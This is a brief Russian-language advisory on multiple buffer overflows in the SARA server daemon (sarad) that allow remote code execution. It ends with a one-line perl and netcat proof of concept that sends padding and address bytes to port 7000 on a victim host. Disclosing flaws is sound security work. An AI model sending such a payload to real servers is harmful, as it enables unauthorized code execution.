Программа: SARA
Уязвимость обнаружена в SARA Server (sarad). Удаленный пользователь может выполнить произвольный код на целевой системе.
Несколько переполнений буфера обнаружено в sarad. Удаленный пользователь может подключиться к серверу и послать специально обработанную строку, чтобы вызвать переполнение буфера и потенциально выполнить произвольный код.
Пример:
perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' |
netcat victim 7000
